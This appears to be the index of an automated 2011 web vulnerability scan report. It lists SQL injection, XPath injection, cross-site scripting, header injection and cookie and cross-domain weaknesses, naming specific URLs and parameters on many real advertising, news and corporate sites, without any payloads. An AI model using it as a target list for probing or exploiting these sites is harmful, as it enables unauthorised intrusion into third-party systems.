XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09032011-04

Report generated by XSS.CX at Sat Sep 03 19:32:42 GMT-06:00 2011.



1. SQL injection

1.1. http://d3fd89.r.axf8.net/mr/e.gif [a parameter]

1.2. http://ib.adnxs.com/getuidnb [Referer HTTP header]

1.3. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s88955233080778 [REST URL parameter 5]

2. XPath injection

2.1. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 2]

2.2. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 [REST URL parameter 3]

3. Cross-site scripting (stored)

3.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

3.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

4. HTTP header injection

4.1. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

4.2. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

4.3. http://c7.zedo.com/utils/ecSet.js [v parameter]

4.4. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

5. Cross-site scripting (reflected)

5.1. http://ad.turn.com/server/pixel.htm [fpid parameter]

5.2. http://ad.turn.com/server/pixel.htm [sp parameter]

5.3. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

5.4. http://admeld.adnxs.com/usersync [admeld_callback parameter]

5.5. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [height parameter]

5.6. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [wcguid parameter]

5.7. http://affiliates.eblastengine.com/Widgets/EmailSignup.aspx [width parameter]

5.8. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpt parameter]

5.9. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [mpvc parameter]

5.10. http://altfarm.mediaplex.com/ad/js/13966-88303-3335-5 [name of an arbitrarily supplied request parameter]

5.11. http://api.bit.ly/shorten [callback parameter]

5.12. http://api.bit.ly/shorten [longUrl parameter]

5.13. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

5.14. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

5.15. http://api.echoenabled.com/v1/search [q parameter]

5.16. http://b.scorecardresearch.com/beacon.js [c1 parameter]

5.17. http://b.scorecardresearch.com/beacon.js [c10 parameter]

5.18. http://b.scorecardresearch.com/beacon.js [c15 parameter]

5.19. http://b.scorecardresearch.com/beacon.js [c2 parameter]

5.20. http://b.scorecardresearch.com/beacon.js [c3 parameter]

5.21. http://b.scorecardresearch.com/beacon.js [c4 parameter]

5.22. http://b.scorecardresearch.com/beacon.js [c5 parameter]

5.23. http://b.scorecardresearch.com/beacon.js [c6 parameter]

5.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

5.25. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [$ parameter]

5.26. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]

5.27. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js [q parameter]

5.28. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

5.29. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [$ parameter]

5.30. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]

5.31. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

5.32. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js [q parameter]

5.33. http://cm.npc-mcclatchy.overture.com/js_1_0/ [css_url parameter]

5.34. http://control.adap.tv/control [as parameter]

5.35. http://control.adap.tv/control [categories parameter]

5.36. http://control.adap.tv/control [context parameter]

5.37. http://control.adap.tv/control [eov parameter]

5.38. http://control.adap.tv/control [height parameter]

5.39. http://control.adap.tv/control [htmlEnabled parameter]

5.40. http://control.adap.tv/control [isTop parameter]

5.41. http://control.adap.tv/control [keywords parameter]

5.42. http://control.adap.tv/control [name of an arbitrarily supplied request parameter]

5.43. http://control.adap.tv/control [pageUrl parameter]

5.44. http://control.adap.tv/control [sessionId parameter]

5.45. http://control.adap.tv/control [width parameter]

5.46. http://digg.com/submit [REST URL parameter 1]

5.47. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

5.48. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

5.49. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

5.50. http://jlinks.industrybrains.com/jsct [ct parameter]

5.51. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

5.52. http://jlinks.industrybrains.com/jsct [tr parameter]

5.53. http://js.revsci.net/gateway/gw.js [csid parameter]

5.54. http://js.www.reuters.com/recommend/re/re [callback parameter]

5.55. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

5.56. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]

5.57. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]

5.58. http://r.turn.com/server/pixel.htm [fpid parameter]

5.59. http://r.turn.com/server/pixel.htm [sp parameter]

5.60. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [lr parameter]

5.61. http://rtq.careerbuilder.com/RTQ/jobstream.aspx [rssid parameter]

5.62. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [cb parameter]

5.63. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkey parameter]

5.64. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app [plckcommentonkeytype parameter]

5.65. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]

5.66. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard [mbox parameter]

5.67. http://trc.taboolasyndication.com/reuters/trc/2/json [cb parameter]

5.68. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [name of an arbitrarily supplied request parameter]

5.69. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 1]

5.70. http://www.idg.com/www/rd.nsf/rd [REST URL parameter 3]

5.71. http://www.idg.com/www/rd.nsf/rd [name of an arbitrarily supplied request parameter]

5.72. http://www.linkedin.com/countserv/count/share [url parameter]

5.73. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [callback parameter]

5.74. http://www.reuters.com/assets/commentsChild [articleId parameter]

5.75. http://www.reuters.com/assets/commentsChild [channel parameter]

5.76. http://www.reuters.com/assets/searchIntercept [blob parameter]

5.77. http://www.reuters.com/tracker/guid [cb parameter]

5.78. https://www.sprint.net/ [name of an arbitrarily supplied request parameter]

5.79. https://www.sprint.net/external_videos/pages.php [REST URL parameter 1]

5.80. https://www.sprint.net/external_videos/pages.php [REST URL parameter 2]

5.81. https://www.sprint.net/index.php [REST URL parameter 1]

5.82. https://www.sprint.net/index.php [name of an arbitrarily supplied request parameter]

5.83. https://www.sprint.net/min/ [REST URL parameter 1]

5.84. http://www.und.com/allaccess/ [REST URL parameter 1]

5.85. http://www.und.com/favicon.ico [REST URL parameter 1]

5.86. http://www.und.com/gametracker/launch/ [REST URL parameter 1]

5.87. http://www.und.com/gametracker/launch/ [REST URL parameter 2]

5.88. http://www.und.com/nd.ico [REST URL parameter 1]

5.89. http://www.und.com/photogallery/ [REST URL parameter 1]

5.90. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 1]

5.91. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 2]

5.92. http://www.und.com/sports/m-footbl/9873956 [REST URL parameter 3]

5.93. http://www.und.com/sports/m-footbl/9873956 [name of an arbitrarily supplied request parameter]

5.94. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 1]

5.95. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 2]

5.96. http://www.und.com/sports/m-footbl/9874134 [REST URL parameter 3]

5.97. http://www.und.com/sports/m-footbl/9874134 [name of an arbitrarily supplied request parameter]

5.98. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 1]

5.99. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 2]

5.100. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 3]

5.101. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 4]

5.102. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 5]

5.103. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 6]

5.104. http://www.und.com/sports/m-footbl/grfx.cstv.com/schools/nd/graphics/spacer.gif [REST URL parameter 7]

5.105. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 1]

5.106. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 2]

5.107. http://www.und.com/sports/m-footbl/nd-m-footbl-body.html [REST URL parameter 3]

5.108. http://www.careerbuilder.com/ [Referer HTTP header]

5.109. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx [Referer HTTP header]

5.110. http://www.careerbuilder.com/JobSeeker/Jobs/JobDetails.aspx [Referer HTTP header]

5.111. http://www.careerbuilder.com/JobSeeker/Jobs/JobQuery.aspx [Referer HTTP header]

5.112. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx [Referer HTTP header]

5.113. http://www.careerbuilder.com/Jobseeker/Jobs/JobResults.aspx [Referer HTTP header]

5.114. http://www.careerbuilder.com/PLI/R/JSToolkit.htm [Referer HTTP header]

5.115. http://www.careerbuilder.com/jobseeker/companies/companysearch.aspx [Referer HTTP header]

5.116. http://www.careerbuilder.com/jobseeker/jobs/jobfindadv.aspx [Referer HTTP header]

5.117. http://www.sologig.com/ [Referer HTTP header]

5.118. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html [ruid cookie]

5.119. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js [ruid cookie]

5.120. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js [ruid cookie]

5.121. http://www.nbcudigitaladops.com/hosted/util/getRemoteDomainCookies.js [xa cookie]

6. Flash cross-domain policy

6.1. http://a.tribalfusion.com/crossdomain.xml

6.2. http://ad.afy11.net/crossdomain.xml

6.3. http://ad.doubleclick.net/crossdomain.xml

6.4. http://ad.turn.com/crossdomain.xml

6.5. http://admeld.adnxs.com/crossdomain.xml

6.6. http://admin.brightcove.com/crossdomain.xml

6.7. http://ads.undertone.com/crossdomain.xml

6.8. http://altfarm.mediaplex.com/crossdomain.xml

6.9. http://api.affinesystems.com/crossdomain.xml

6.10. http://api.bit.ly/crossdomain.xml

6.11. http://as.casalemedia.com/crossdomain.xml

6.12. http://audit.303br.net/crossdomain.xml

6.13. http://b.scorecardresearch.com/crossdomain.xml

6.14. http://bh.contextweb.com/crossdomain.xml

6.15. http://c.brightcove.com/crossdomain.xml

6.16. http://c5.zedo.com/crossdomain.xml

6.17. http://c7.zedo.com/crossdomain.xml

6.18. http://cdn.cinesport.com/crossdomain.xml

6.19. http://cdn.gigya.com/crossdomain.xml

6.20. http://cdn.taboolasyndication.com/crossdomain.xml

6.21. http://cdn.turn.com/crossdomain.xml

6.22. http://cdn.visiblemeasures.com/crossdomain.xml

6.23. https://cdns.gigya.com/crossdomain.xml

6.24. http://clk.fetchback.com/crossdomain.xml

6.25. http://companion.adap.tv/crossdomain.xml

6.26. http://control.adap.tv/crossdomain.xml

6.27. http://d3fd89.r.axf8.net/crossdomain.xml

6.28. http://external.ak.fbcdn.net/crossdomain.xml

6.29. http://findnsave.sacbee.com/crossdomain.xml

6.30. http://gannett.gcion.com/crossdomain.xml

6.31. http://goku.brightcove.com/crossdomain.xml

6.32. http://gscounters.gigya.com/crossdomain.xml

6.33. http://i.w55c.net/crossdomain.xml

6.34. http://ib.adnxs.com/crossdomain.xml

6.35. http://imp.fetchback.com/crossdomain.xml

6.36. http://init.lingospot.com/crossdomain.xml

6.37. http://js.revsci.net/crossdomain.xml

6.38. http://load.exelator.com/crossdomain.xml

6.39. http://load.tubemogul.com/crossdomain.xml

6.40. http://log.adap.tv/crossdomain.xml

6.41. http://metrics.sprint.com/crossdomain.xml

6.42. http://motifcdn2.doubleclick.net/crossdomain.xml

6.43. http://nmcharlotte.112.2o7.net/crossdomain.xml

6.44. http://odb.outbrain.com/crossdomain.xml

6.45. http://p.brilig.com/crossdomain.xml

6.46. http://paid.outbrain.com/crossdomain.xml

6.47. http://pbid.pro-market.net/crossdomain.xml

6.48. http://pix04.revsci.net/crossdomain.xml

6.49. http://pixel.invitemedia.com/crossdomain.xml

6.50. http://pixel.quantserve.com/crossdomain.xml

6.51. http://premium.mookie1.com/crossdomain.xml

6.52. http://qlog.adap.tv/crossdomain.xml

6.53. http://r.turn.com/crossdomain.xml

6.54. http://rcv-srv48.inplay.tubemogul.com/crossdomain.xml

6.55. http://receive.inplay.tubemogul.com/crossdomain.xml

6.56. http://redir.adap.tv/crossdomain.xml

6.57. http://s0.2mdn.net/crossdomain.xml

6.58. http://s3.cinesport.com/crossdomain.xml

6.59. http://search.spotxchange.com/crossdomain.xml

6.60. http://secure-us.imrworldwide.com/crossdomain.xml

6.61. http://segments.adap.tv/crossdomain.xml

6.62. http://simg.zedo.com/crossdomain.xml

6.63. https://socialize.gigya.com/crossdomain.xml

6.64. http://sprint.tt.omtrdc.net/crossdomain.xml

6.65. http://statse.webtrendslive.com/crossdomain.xml

6.66. http://studio-5.financialcontent.com/crossdomain.xml

6.67. http://sync.adap.tv/crossdomain.xml

6.68. http://sync.mathtag.com/crossdomain.xml

6.69. http://sync.tidaltv.com/crossdomain.xml

6.70. http://tags.bluekai.com/crossdomain.xml

6.71. http://tcr.tynt.com/crossdomain.xml

6.72. http://traffic.outbrain.com/crossdomain.xml

6.73. http://trc.taboolasyndication.com/crossdomain.xml

6.74. http://usatoday1.112.2o7.net/crossdomain.xml

6.75. http://vast.ap919.btrll.com/crossdomain.xml

6.76. http://video.od.visiblemeasures.com/crossdomain.xml

6.77. http://wac.3a03.edgecastcdn.net/crossdomain.xml

6.78. http://www.goutsa.com/crossdomain.xml

6.79. http://www.wunderground.com/crossdomain.xml

6.80. http://www.zvents.com/crossdomain.xml

6.81. http://adadvisor.net/crossdomain.xml

6.82. http://charlotteobserver.adperfect.com/crossdomain.xml

6.83. http://cm.npc-mcclatchy.overture.com/crossdomain.xml

6.84. http://content.usatoday.com/crossdomain.xml

6.85. http://delivery.sprint.com/crossdomain.xml

6.86. http://developers.facebook.com/crossdomain.xml

6.87. http://disqus.com/crossdomain.xml

6.88. http://espn.go.com/crossdomain.xml

6.89. http://friendfeed.com/crossdomain.xml

6.90. http://googleads.g.doubleclick.net/crossdomain.xml

6.91. http://grfx.cstv.com/crossdomain.xml

6.92. http://ocp.ncaa.com/crossdomain.xml

6.93. http://onlyfans.cstv.com/crossdomain.xml

6.94. http://optimized-by.rubiconproject.com/crossdomain.xml

6.95. http://pagead2.googlesyndication.com/crossdomain.xml

6.96. http://picasaweb.google.com/crossdomain.xml

6.97. http://portfolio.us.reuters.com/crossdomain.xml

6.98. http://pubads.g.doubleclick.net/crossdomain.xml

6.99. http://rd.rlcdn.com/crossdomain.xml

6.100. http://rtq.careerbuilder.com/crossdomain.xml

6.101. http://search.charlotteobserver.com/crossdomain.xml

6.102. http://search2.sacbee.com/crossdomain.xml

6.103. http://snas.nbcuni.com/crossdomain.xml

6.104. http://static.ak.fbcdn.net/crossdomain.xml

6.105. http://syndication.mmismm.com/crossdomain.xml

6.106. http://www.careerbuilder.com/crossdomain.xml

6.107. http://www.cars.com/crossdomain.xml

6.108. http://www.charlotteobserver.com/crossdomain.xml

6.109. http://www.facebook.com/crossdomain.xml

6.110. http://www.fansonly.com/crossdomain.xml

6.111. http://www.foxsportssouthwest.com/crossdomain.xml

6.112. http://www.latimes.com/crossdomain.xml

6.113. http://www.myspace.com/crossdomain.xml

6.114. http://www.reuters.com/crossdomain.xml

6.115. http://www.sacbee.com/crossdomain.xml

6.116. http://www.sologig.com/crossdomain.xml

6.117. http://www.stumbleupon.com/crossdomain.xml

6.118. http://www.tsn.ca/crossdomain.xml

6.119. http://www.usatoday.com/crossdomain.xml

6.120. http://www.wtp101.com/crossdomain.xml

6.121. http://www.youtube.com/crossdomain.xml

6.122. http://admin6.testandtarget.omniture.com/crossdomain.xml

6.123. http://api.twitter.com/crossdomain.xml

6.124. https://docs.google.com/crossdomain.xml

6.125. http://matcher-rbc.bidder7.mookie1.com/crossdomain.xml

6.126. http://twitter.com/crossdomain.xml

6.127. http://www.traffic.com/crossdomain.xml

7. Silverlight cross-domain policy

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml

7.2. http://b.scorecardresearch.com/clientaccesspolicy.xml

7.3. http://content.usatoday.com/clientaccesspolicy.xml

7.4. http://metrics.sprint.com/clientaccesspolicy.xml

7.5. http://nmcharlotte.112.2o7.net/clientaccesspolicy.xml

7.6. http://pixel.quantserve.com/clientaccesspolicy.xml

7.7. http://s0.2mdn.net/clientaccesspolicy.xml

7.8. http://secure-us.imrworldwide.com/clientaccesspolicy.xml

7.9. http://usatoday1.112.2o7.net/clientaccesspolicy.xml

7.10. http://video.od.visiblemeasures.com/clientaccesspolicy.xml

7.11. http://www.goutsa.com/clientaccesspolicy.xml

7.12. http://www.tulsaworld.com/clientaccesspolicy.xml

7.13. http://www.usatoday.com/clientaccesspolicy.xml

8. Cleartext submission of password

8.1. http://digg.com/submit

8.2. http://www.foxsportssouthwest.com/09/03/11/Longhorn-Network-on-the-air-and-out-of-s/landing_big12.html

8.3. http://www.ispsports.com/radio-network-affiliates.cfm

8.4. http://www.sacbee.com/reg-bin/int.cgi

8.5. http://www.sacbee.com/reg-bin/int.cgi

8.6. http://www.thatsracin.com/reg-bin/int.cgi

8.7. http://www.thatsracin.com/reg-bin/int.cgi

8.8. http://www.thatsracin.com/reg-bin/int.cgi

9. SSL cookie without secure flag set

10. Session token in URL

10.1. http://charlotteobserver.adperfect.com/

10.2. http://control.adap.tv/control

10.3. http://feedburner.google.com/fb/a/mailverify

10.4. http://log.adap.tv/log

10.5. http://qlog.adap.tv/log

10.6. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard

10.7. http://www.facebook.com/extern/login_status.php

11. SSL certificate

11.1. https://google.com/

11.2. https://login.yahoo.com/

11.3. https://observ.subscribeobserver.com/

11.4. https://cdns.gigya.com/

11.5. https://commerce.us.reuters.com/

11.6. https://docs.google.com/

11.7. https://mail.google.com/

11.8. https://maps-api-ssl.google.com/

11.9. https://sites.google.com/

11.10. https://socialize.gigya.com/

11.11. https://subscriberservices.mcclatchy.com/

11.12. https://www.linkedin.com/

11.13. https://www.sprint.net/

12. Password field submitted using GET method

13. Cookie scoped to parent domain

13.1. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

13.2. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

13.3. http://a.tribalfusion.com/j.ad

13.4. http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3

13.5. http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5

13.6. http://ad.turn.com/r/cs

13.7. http://ad.turn.com/server/pixel.htm

13.8. http://ad.yabuka.com/statsin/adframe/803/300x250

13.9. http://admeld.adnxs.com/usersync

13.10. http://ads.revsci.net/adserver/ako

13.11. http://ads.revsci.net/adserver/ako

13.12. http://ads.revsci.net/adserver/ako

13.13. http://ads.revsci.net/adserver/ako

13.14. http://ads.undertone.com/ajs.php

13.15. http://ak1.abmr.net/is/ads.undertone.com

13.16. http://ak1.abmr.net/is/tag.admeld.com

13.17. http://api.bizographics.com/v1/profile.redirect

13.18. http://as.casalemedia.com/s

13.19. http://b.scorecardresearch.com/b

13.20. http://b.scorecardresearch.com/p

13.21. http://b.scorecardresearch.com/r

13.22. http://bh.contextweb.com/bh/rtset

13.23. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

13.24. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

13.25. http://c7.zedo.com/utils/ecSet.js

13.26. http://clk.fetchback.com/serve/fb/click

13.27. http://cm.npc-mcclatchy.overture.com/js_1_0/

13.28. http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js

13.29. http://companion.adap.tv/companion/post

13.30. http://control.adap.tv/control

13.31. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

13.32. http://developers.facebook.com/plugins/

13.33. http://feedburner.google.com/fb/a/mailverify

13.34. http://i.w55c.net/ping_match.gif

13.35. http://ib.adnxs.com/getuid

13.36. http://ib.adnxs.com/getuidnb

13.37. http://imp.fetchback.com/serve/fb/adtag.js

13.38. http://imp.fetchback.com/serve/fb/imp

13.39. http://js.revsci.net/gateway/gw.js

13.40. http://leadback.advertising.com/adcedge/lb

13.41. http://load.exelator.com/load/

13.42. http://log.adap.tv/log

13.43. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516

13.44. http://odb.outbrain.com/utils/get

13.45. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

13.46. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

13.47. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js

13.48. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js

13.49. http://p.brilig.com/contact/bct

13.50. http://picasaweb.google.com/lh/view

13.51. http://pix04.revsci.net/A11149/a4/0/0/123.302

13.52. http://pix04.revsci.net/D08734/a1/0/0/0.gif

13.53. http://pix04.revsci.net/D08734/a1/0/3/0.js

13.54. http://pix04.revsci.net/F09828/a4/0/0/0.js

13.55. http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js

13.56. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

13.57. http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js

13.58. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

13.59. http://pixel.rubiconproject.com/tap.php

13.60. http://pixel.rubiconproject.com/tap.php

13.61. http://pixel.rubiconproject.com/tap.php

13.62. http://pixel.rubiconproject.com/tap.php

13.63. http://r.openx.net/set

13.64. http://r.turn.com/server/pixel.htm

13.65. http://rt.legolas-media.com/lgrt

13.66. http://segments.adap.tv/data

13.67. http://segments.adap.tv/data/

13.68. http://sitelife.usatoday.com/ver1.0/Stats/Tracker.gif

13.69. http://sitelife.usatoday.com/ver1.0/sys/jsonp.app

13.70. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

13.71. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

13.72. http://sync.adap.tv/sync

13.73. http://sync.mathtag.com/sync/img

13.74. http://tacoda.at.atwola.com/rtx/r.js

13.75. http://tags.bluekai.com/site/2964

13.76. http://tags.bluekai.com/site/38

13.77. http://tags.bluekai.com/site/4449

13.78. http://tags.bluekai.com/site/450

13.79. http://tags.bluekai.com/site/4592

13.80. http://tap.rubiconproject.com/oz/feeds/invite-media-rtb/tokens/

13.81. http://tu.connect.wunderloop.net/TU/1/1/1/

13.82. http://tu.connect.wunderloop.net/TU2/1/1/1/

13.83. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s88160667486954

13.84. http://www.bizographics.com/collect/

13.85. http://www.careerbuilder.com/JobPoster/Products/PostJobsInfo.aspx

13.86. http://www.careerbuilder.com/JobSeeker/Resumes/PostResumeNew/PostYourResume.aspx

13.87. http://www.facebook.com/campaign/landing.php

13.88. http://www.facebook.com/home.php

13.89. http://www.facebook.com/share.php

13.90. http://www.google.com/insights/search/

13.91. https://www.linkedin.com/secure/login

13.92. http://www.myspace.com/Modules/PostTo/Pages/

13.93. http://www.sacbee.com/reg_js/access_check.js

13.94. http://www.wtp101.com/pull_sync

13.95. http://www.youtube.com/results

14. Cookie without HttpOnly flag set

14.1. http://content.usatoday.com/quickquestion/jquery/1.0.1.html

14.2. http://findnsave.sacbee.com/api/aacoupons.json

14.3. http://findnsave.sacbee.com/api/groupon.json

14.4. http://search.barnesandnoble.com/The-Sacramento-Bee/The-McClatchy-Company/e/2940000984826

14.5. http://shop.sprint.com/mysprint/shop/phone_wall.jsp

14.6. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies

14.7. http://trc.taboolasyndication.com/reuters/trc/2/json

14.8. http://www.cars.com/go/crp/index.jsp

14.9. https://www.linkedin.com/secure/login

14.10. http://www.traffic.com/Charlotte-Traffic/Charlotte-Traffic-Map.html

14.11. http://www.usatoday.com/community/profile.htm

14.12. http://www.usatoday.com/marketing/feedback.htm

14.13. http://www.usatoday.com/marketing/questions.htm

14.14. http://a.tribalfusion.com/j.ad

14.15. http://ad.360yield.com/match

14.16. http://ad.doubleclick.net/jump/N763.no_url_specifiedOX2619/B5770010.3

14.17. http://ad.doubleclick.net/jump/N763.usatoday.comOX3622/B5770010.5

14.18. http://ad.turn.com/r/cs

14.19. http://ad.turn.com/server/pixel.htm

14.20. http://ad.yabuka.com/statsin/adframe/803/300x250

14.21. http://ad.yieldmanager.com/pixel

14.22. http://ads.revsci.net/adserver/ako

14.23. http://ads.revsci.net/adserver/ako

14.24. http://ads.revsci.net/adserver/ako

14.25. http://ads.revsci.net/adserver/ako

14.26. http://ads.undertone.com/ajs.php

14.27. http://ads.undertone.com/fc.php

14.28. http://ads.undertone.com/l

14.29. http://ak1.abmr.net/is/ads.undertone.com

14.30. http://ak1.abmr.net/is/tag.admeld.com

14.31. http://api.bizographics.com/v1/profile.redirect

14.32. http://api.twitter.com/1/UND_com/lists/notre-dame-football/statuses.json

14.33. http://ar.atwola.com/atd

14.34. http://as.casalemedia.com/s

14.35. http://b.scorecardresearch.com/b

14.36. http://b.scorecardresearch.com/p

14.37. http://b.scorecardresearch.com/r

14.38. http://bh.contextweb.com/bh/rtset

14.39. http://bookmarks.yahoo.com/myresults/bookmarklet

14.40. http://c7.zedo.com/bar/v16-504/c5/jsc/fm.js

14.41. http://c7.zedo.com/bar/v16-504/c5/jsc/fmr.js

14.42. http://c7.zedo.com/utils/ecSet.js

14.43. http://c7.zedo.com/utils/ecSet.js

14.44. http://clk.fetchback.com/serve/fb/click

14.45. http://cm.npc-mcclatchy.overture.com/js_1_0/

14.46. http://cm.npc-mcclatchy.overture.com/partner/js/ypn.js

14.47. http://companion.adap.tv/companion/post

14.48. http://control.adap.tv/control

14.49. http://d.p-td.com/r/du/id/L21rdC80L21waWQvMzU5ODk3MA/mpuid/NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

14.50. http://developers.facebook.com/plugins/

14.51. http://i.w55c.net/ping_match.gif

14.52. http://imp.fetchback.com/serve/fb/adtag.js

14.53. http://imp.fetchback.com/serve/fb/imp

14.54. http://js.revsci.net/gateway/gw.js

14.55. http://leadback.advertising.com/adcedge/lb

14.56. http://legolas.nexac.com/lgalt

14.57. http://load.exelator.com/load/

14.58. http://log.adap.tv/log

14.59. http://nmcharlotte.112.2o7.net/b/ss/nmcharlotte/1/H.20.3/s85129847696516

14.60. http://odb.outbrain.com/utils/get

14.61. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js

14.62. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html

14.63. http://optimized-by.rubiconproject.com/a/6291/9346/15214-15.js

14.64. http://optimized-by.rubiconproject.com/a/6291/9346/15214-2.js

14.65. http://p.brilig.com/contact/bct

14.66. http://pix04.revsci.net/A11149/a4/0/0/123.302

14.67. http://pix04.revsci.net/D08734/a1/0/0/0.gif

14.68. http://pix04.revsci.net/D08734/a1/0/3/0.js

14.69. http://pix04.revsci.net/F09828/a4/0/0/0.js

14.70. http://pix04.revsci.net/I07714/b3/0/3/1008211/954068462.js

14.71. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

14.72. http://pix04.revsci.net/J06575/b3/0/3/1008211/846374105.js

14.73. http://pixel.quantserve.com/pixel/p-61YFdB4e9hBRs.gif

14.74. http://pixel.rubiconproject.com/tap.php

14.75. http://pixel.rubiconproject.com/tap.php

14.76. http://pixel.rubiconproject.com/tap.php

14.77. http://pixel.rubiconproject.com/tap.php

14.78. http://r.openx.net/set

14.79. http://r.turn.com/server/pixel.htm

14.80. http://rt.legolas-media.com/lgrt

14.81. http://segments.adap.tv/data

14.82. http://segments.adap.tv/data/

14.83. http://sitelife.usatoday.com/ver1.0/Content/images/no-user-image.gif

14.84. http://sitelife.usatoday.com/ver1.0/Content/images/store/9/0/59f90df9-de0f-4ab1-b029-5ae171768d76.P4Avatar.jpg

14.85. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-action-buttons.png

14.86. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-background.png

14.87. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-hide.gif

14.88. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-reply-arrow-show.gif

14.89. http://sitelife.usatoday.com/ver1.0/Content/ua/images/comments/pluck-comm-rss-button.gif

14.90. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-avatar-blocked.gif

14.91. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg-2.jpg

14.92. http://sitelife.usatoday.com/ver1.0/Content/ua/images/pluck-pagination-bg.jpg

